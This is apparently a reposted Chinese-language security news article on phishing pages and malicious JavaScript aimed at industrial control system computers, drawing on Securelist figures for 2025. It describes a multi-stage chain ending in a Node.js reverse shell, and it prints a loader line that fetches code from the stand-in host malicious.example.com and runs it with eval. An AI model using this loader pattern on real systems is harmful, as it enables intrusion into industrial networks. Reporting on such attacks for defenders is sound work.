工业自动化系统已成为复杂网络犯罪分子的最新战场,他们正部署精心设计的恶意脚本和钓鱼页面来入侵工业控制系统计算机。
2025年上半年,攻击者越来越多地转向基于网络的攻击向量,利用遗留接口、薄弱的身份验证以及运营技术环境中过时的软件进行攻击。
这些威胁行为者通过被入侵的网站和仿冒合法供应商页面或内部仪表板的钓鱼邮件,投放恶意JavaScript有效载荷。
一旦用户与该页面进行交互,脚本就会自动执行,使攻击者能够交付旨在窃取凭证、建立后门并在网络内横向移动的下一阶段有效载荷。
Securelist的检测数据显示,2025年第二季度,恶意脚本和钓鱼页面被拦截的工业控制系统计算机比例达到6.49%,较上一季度略有下降。
尽管出现小幅下降,但这一类别仍然是工业网络面临的最普遍的基于网络的威胁,超过了特洛伊木马和键盘记录器等传统恶意软件家族。
区域分析显示,非洲和东南亚的感染尝试次数最多,而北欧则是受攻击最少的地区。
被拦截脚本数量的下降可能既反映了防御措施的改进,也体现了攻击者转向更具针对性、低流量的攻击活动。
Securelist的分析师发现,许多此类攻击利用Modbus和OPC UA等常见工业协议,在表面无害的脚本宿主中嵌入命令序列。
通过将控制指令伪装成合法维护界面的一部分,威胁行为者可以操纵可编程逻辑控制器(PLC)和监控与数据采集(SCADA)系统,而不会触发传统的 antivirus 签名。
攻击者通常会将多个JavaScript模块串联起来:初始的加载器脚本会拉取第二阶段的下载器,而该下载器进而会获取一个用Node.js编写的轻量级反向shell。
虽然大多数事件涉及凭证窃取和侦察,但一些高影响的攻击活动能够直接操纵工业流程。
在一个案例中,攻击者篡改了一条化学生产线的设定值,导致温度波动,进而引发了紧急停机。
在另一起事件中,攻击者使用了模仿知名远程支持门户的钓鱼页面来窃取特权账户,随后部署了恶意脚本以禁用安全联锁装置。
这些操作凸显了在所有面向工业控制系统(ICS)的网络界面上部署深度检测代理和多因素认证的迫切需求。
感染机制与脚本交付
最初的感染通常始于一封钓鱼邮件,其中包含指向克隆供应商门户的链接。访问该页面后,一段JavaScript代码片段会从异地服务器自动下载并执行:
[script]
// Loader fetches and executes the second-stage payload
fetch('http://malicious.example.com/loader.js')
.then(response => response.text())
.then(code => eval(code));
[/script]然后,加载器脚本会将一个基于Node.js的shell写入磁盘,并将其注册为系统服务,以确保在重启后仍能保持运行。
它还会向浏览器进程中注入WebSocket钩子,以便通过现有的网络通道传输PLC命令。
通过混淆函数名称和用Base64编码有效载荷(仅在运行时解码),可进一步实现躲避检测。
持续对Web网关日志进行监控并实施严格的内容安全策略,能够打破这一执行链,防止未授权脚本的获取。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
